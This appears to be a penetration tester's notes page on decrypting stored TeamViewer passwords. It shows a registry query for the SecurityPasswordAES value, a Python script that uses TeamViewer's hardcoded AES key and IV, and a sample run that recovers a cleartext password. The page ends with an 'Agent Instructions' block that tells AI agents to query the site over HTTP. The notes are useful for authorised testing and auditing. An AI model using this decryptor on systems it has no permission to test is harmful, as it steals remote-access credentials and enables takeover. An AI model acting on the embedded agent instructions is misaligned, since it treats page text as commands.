# TeamViewer Decrypt Execute the following registry query ``` reg query HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\TeamViewer\Version7 /v SecurityPasswordAES ``` The result will be something like this: ``` HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\TeamViewer\Version7 SecurityPasswordAES REG_BINARY 871C158E545657D6D714B34730465D85E4A5F96D3E6CCF47AE7310A3FC41AA4A18ADFE594917DD1847A810EFF8C13356 ``` Source code from GitHub {% embed url="" %} ```python #!/usr/bin/env python3 import sys, hexdump, binascii from Crypto.Cipher import AES class AESCipher: def __init__(self, key): self.key = key def decrypt(self, iv, data): self.cipher = AES.new(self.key, AES.MODE_CBC, iv) return self.cipher.decrypt(data) print(''' This is a quick and dirty Teamviewer password decrypter basis wonderful post by @whynotsecurity. Read this blogpost if you haven't already : https://whynotsecurity.com/blog/teamviewer Please check below mentioned registry values and enter its value manually without spaces. "SecurityPasswordAES" OR "OptionsPasswordAES" OR "SecurityPasswordExported" OR "PermanentPassword" ''') hex_str_cipher = input("Enter output from registry without spaces : ") key = binascii.unhexlify("0602000000a400005253413100040000") iv = binascii.unhexlify("0100010067244F436E6762F25EA8D704") ciphertext = binascii.unhexlify(hex_str_cipher) raw_un = AESCipher(key).decrypt(iv, ciphertext) password = raw_un.decode('utf-16') print("Decrypted password is : ",password) ``` Running the script ```bash ./teamviewer_password_decryptor.py This is a quick and dirty Teamviewer password decrypter basis wonderful post by @whynotsecurity. Read this blogpost if you haven't already : https://whynotsecurity.com/blog/teamviewer Please check below mentioned registry values and enter its value manually without spaces. "SecurityPasswordAES" OR "OptionsPasswordAES" OR "SecurityPasswordExported" OR "PermanentPassword" Enter output from registry without spaces : 871C158E545657D6D714B34730465D85E4A5F96D3E6CCF47AE7310A3FC41AA4A18ADFE594917DD1847A810EFF8C13356 Decrypted password is : RedBullEnergyBadXD ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://squid22.gitbook.io/notes/windows-1/teamviewer-decrypt.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.